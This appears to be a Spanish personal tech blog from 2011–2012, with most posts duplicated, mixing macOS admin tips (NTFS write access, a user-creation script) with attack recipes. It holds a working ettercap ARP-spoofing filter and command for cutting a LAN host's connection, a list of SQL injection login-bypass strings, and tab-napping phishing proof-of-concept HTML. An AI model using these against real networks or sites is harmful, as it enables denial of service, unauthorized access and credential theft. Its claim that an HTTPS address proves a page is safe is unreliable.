En la web http://www.ostamyy.com/ podemos encontrar una lista de compañías que ofrecen conexión a internet ordenadas por paises.
http://www.ostamyy.com/ISPs/
--------------------------------------- Cautivo en las selvas de occidente te trajeron a Roma, esclavo, te dieron el oficio de herrero y haces cadenas. El hierro al rojo que sacas de los hornos lo puedes moldear como quieras, puedes hacer espadas para que tus paisanos rompan sus cadenas, pero tu, ese esclavo, haces cadenas, mas cadenas. Joseba Sarrionaindia. ---------------------------------------
lunes, 26 de marzo de 2012
sábado, 3 de marzo de 2012
DoS trafico de red en LAN con filtro ettercap
Primero se crea el filtro con un editor de texto
if (ip.src=="ip objetivo" || ip.dst=="ip objetivo) {
drop();
kill();
msg("Denegacion\n");
}
Guardamos el filtro con la extension .eff
Compilamos en filtro para ettercap con el comando
etterfilter nombrearchivo.eff -o nombrearchivo.ef
Una vez creado se lanza desde ettercap con el comando
ettercap -T -q -F nombrearchivo.ef -M ARP /ip objetivo/ //
Los paquetes enviados a la ip objetivo los recibira nuestra maquina que los desechara inutilizando la conexion de red de la maquina objetivo.
if (ip.src=="ip objetivo" || ip.dst=="ip objetivo) {
drop();
kill();
msg("Denegacion\n");
}
Guardamos el filtro con la extension .eff
Compilamos en filtro para ettercap con el comando
etterfilter nombrearchivo.eff -o nombrearchivo.ef
Una vez creado se lanza desde ettercap con el comando
ettercap -T -q -F nombrearchivo.ef -M ARP /ip objetivo/ //
Los paquetes enviados a la ip objetivo los recibira nuestra maquina que los desechara inutilizando la conexion de red de la maquina objetivo.
martes, 28 de febrero de 2012
Acceso de lectura y escritura para las particiones NTFS en mac os x SnowLeopard
Desde la terminal:
diskutil info /Volumes/NOMBRE_DEL_DISCO
Deberemos copiar el UUID que nos devuelve el comando. Lo siguiente es comprobar si el fichero /etc/fstab existe
$ ls /etc/ | grep fstab
si existe, haremos una copia de seguridad
$ cp /etc/fstab ~/Desktop/
editamos el fichero con:
$ sudo vim /etc/fstab
y añadimos la línea
UUID=uuid_del_disco none ntfs rw
salvamos los cambios y reiniciamos. Ahora podremos escribir sobre una partición NTFS.
Visto y medio fusilado de http://comandogum.com/2010/02/snowleopard-permite-la-escritura-sobre-discos-con-formato-ntfs.gum.html
diskutil info /Volumes/NOMBRE_DEL_DISCO
Deberemos copiar el UUID que nos devuelve el comando. Lo siguiente es comprobar si el fichero /etc/fstab existe
$ ls /etc/ | grep fstab
si existe, haremos una copia de seguridad
$ cp /etc/fstab ~/Desktop/
editamos el fichero con:
$ sudo vim /etc/fstab
y añadimos la línea
UUID=uuid_del_disco none ntfs rw
salvamos los cambios y reiniciamos. Ahora podremos escribir sobre una partición NTFS.
Visto y medio fusilado de http://comandogum.com/2010/02/snowleopard-permite-la-escritura-sobre-discos-con-formato-ntfs.gum.html
viernes, 24 de febrero de 2012
Shell script para creación de usuario en macos x desde la Terminal
#!/bin/bash
# This script creates a user account under Mac OS X
# (tested with 10.5 and 10.6; likely works with 10.4 but not earlier)
# Written by Clinton Blackmore, based on work at
# http://serverfault.com/questions/20702
# === Typically, this is all you need to edit ===
USERNAME=joeadmin
FULLNAME="Joe Admin"
PASSWORD="hard_to_hack"
# A list of (secondary) groups the user should belong to
# This makes the difference between admin and non-admin users.
# Leave only one uncommented
#SECONDARY_GROUPS="" # for a non-admin user
SECONDARY_GROUPS="admin _lpadmin _appserveradm _appserverusr" # for an admin user
# ====
if [[ $UID -ne 0 ]]; then echo "Please run $0 as root." && exit 1; fi
# Find out the next available user ID
MAXID=$(dscl . -list /Users UniqueID | awk '{print $2}' | sort -ug | tail -1)
USERID=$((MAXID+1))
# Create the user account
dscl . -create /Users/$USERNAME
dscl . -create /Users/$USERNAME UserShell /bin/bash
dscl . -create /Users/$USERNAME RealName "$FULLNAME"
dscl . -create /Users/$USERNAME UniqueID "$USERID"
dscl . -create /Users/$USERNAME PrimaryGroupID 20
dscl . -create /Users/$USERNAME NFSHomeDirectory /Users/$USERNAME
dscl . -passwd /Users/$USERNAME $PASSWORD
# Add use to any specified groups
for GROUP in $SECONDARY_GROUPS ; do
dseditgroup -o edit -t user -a $USERNAME $GROUP
done
# Create the home directory
createhomedir -c > /dev/null
echo "Created user #$USERID: $USERNAME ($FULLNAME)"
# This script creates a user account under Mac OS X
# (tested with 10.5 and 10.6; likely works with 10.4 but not earlier)
# Written by Clinton Blackmore, based on work at
# http://serverfault.com/questions/20702
# === Typically, this is all you need to edit ===
USERNAME=joeadmin
FULLNAME="Joe Admin"
PASSWORD="hard_to_hack"
# A list of (secondary) groups the user should belong to
# This makes the difference between admin and non-admin users.
# Leave only one uncommented
#SECONDARY_GROUPS="" # for a non-admin user
SECONDARY_GROUPS="admin _lpadmin _appserveradm _appserverusr" # for an admin user
# ====
if [[ $UID -ne 0 ]]; then echo "Please run $0 as root." && exit 1; fi
# Find out the next available user ID
MAXID=$(dscl . -list /Users UniqueID | awk '{print $2}' | sort -ug | tail -1)
USERID=$((MAXID+1))
# Create the user account
dscl . -create /Users/$USERNAME
dscl . -create /Users/$USERNAME UserShell /bin/bash
dscl . -create /Users/$USERNAME RealName "$FULLNAME"
dscl . -create /Users/$USERNAME UniqueID "$USERID"
dscl . -create /Users/$USERNAME PrimaryGroupID 20
dscl . -create /Users/$USERNAME NFSHomeDirectory /Users/$USERNAME
dscl . -passwd /Users/$USERNAME $PASSWORD
# Add use to any specified groups
for GROUP in $SECONDARY_GROUPS ; do
dseditgroup -o edit -t user -a $USERNAME $GROUP
done
# Create the home directory
createhomedir -c > /dev/null
echo "Created user #$USERID: $USERNAME ($FULLNAME)"
martes, 14 de febrero de 2012
Modificar página web en modo local en nuestro navegador.
Introduciendo este código javascript se podrá modificar en el navegador la pagina web visitada. No se modifica en el servidor, solo en tu navegador.
Codigo: javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
Codigo: javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
martes, 11 de octubre de 2011
Inyecciones para pasar accessos SQLi
‘ | ; | ‘; | ‘-- | ‘or 1=1 -- | ‘ or 1=1 -- | ‘or 1=1 -- | ‘ or 1 = 1 -- | ‘ or 1=1 --
or 1=1 -- | or 1=1 -- | or 1 = 1 -- | or 1=1-- | “ or 1=1 -- | ‘ or a=a -- | “ or “a”=”a
‘) or (‘a’=’a | “) or (“a”=”a | a” or “a”=”a | a” or 1=1 -- | a’ or 1=1 -- |
a’ or ‘a’=’a | a’) or (‘a’=’a | a”) or (“a”=”a | admin’-- | ‘ or 0=0 -- | “ or 0=0 --
| or 0=0 -- | ‘ or 0=0# | “ or 0=0# | or 0=0# | )’or 1=1;
or 1=1 -- | or 1=1 -- | or 1 = 1 -- | or 1=1-- | “ or 1=1 -- | ‘ or a=a -- | “ or “a”=”a
‘) or (‘a’=’a | “) or (“a”=”a | a” or “a”=”a | a” or 1=1 -- | a’ or 1=1 -- |
a’ or ‘a’=’a | a’) or (‘a’=’a | a”) or (“a”=”a | admin’-- | ‘ or 0=0 -- | “ or 0=0 --
| or 0=0 -- | ‘ or 0=0# | “ or 0=0# | or 0=0# | )’or 1=1;
miércoles, 5 de octubre de 2011
Tab Napping
Phishing Technique: Tab Napping short code
Author: Jordan Diaz (aka Jbyte)
Website:http://jbyte-security.blogspot.com/
El "tab napping" se aprovecha de los nuevos navegadores y su sistema de varias pestañas. En ellos, sólo hace falta abrir en una ventana el navegador, y se pueden abrir varias pestañas (pulsando la combinación Control T o simplemente asiendo click) para poder navegar en varias páginas a la vez.
Este sistema reconoce qué pestañas están siendo usadas y cuales, aunque están abiertas, no han sido utilizadas en un rato. Estas últimas, cambian sin que nos demos cuenta a una de esas webs clonadas, y si tenemos la mala suerte de entrar en esa pestaña y meter nuestros datos bancarios, los delicuentes ya los tendrán para hacer con ellos lo que quieran.
¿Cómo funciona?
Este sistema instala un código Java Script en nuestro navegador, que hace que la página buena, por ejemplo la del Banco Santander, cambia a una página clonada, sin que, a priori, nos demos cuenta, cuando la pestaña en la que se muestra la web legal del Banco Santander lleve un rato inactiva.
¿Cómo evitarlo?
Podemos identificar si la web es segura o no observando la barra de direcciones. Si la URL empieza con una dirección HTTPS:// es segura.
Siempre, y repetimos, SIEMPRE, hay que fijarse que la dirección de la página de nuestro banco o de una tienda en la que queramos comprar empieza de este modo, antes de dar nuestro número de tarjeta o nuestra contraseña. Es la manera de comprobar que la página está verificada y protegida de timos como éste o como el phising.
Sencillo pero las prisas del día a día o simplemente los descuidos hacen que en ocasiones nos quedem
short Code:
<html>
<head>
<script type="text/javascript">
function setFocus(){
document.getElementById("surname").focus();
}
function sinfoco()
{var pagina = 'http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png';
//document.getElementById("searchBox").focus();
//document.location.href=pagina;
document.documentElement.innerHTML="<html><img src='http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png'></html>";
}
</script>
</head>
<body onload="setFocus();">
<form>
Name: <input type="text" id="name" size="30"><br />
Surname: <input type="text" id="surname" size="30" onblur=sinfoco()>
</form>
</body>
</html>
Solo nos queda copiar el texto y guardarlo como un archivo html y listo, nos al cambiar de pesataña nos redirigira a una web con una imagen de gmai.
FIN
http://www.exploit-db.com/papers/13953/
Suscribirse a:
Comentarios (Atom)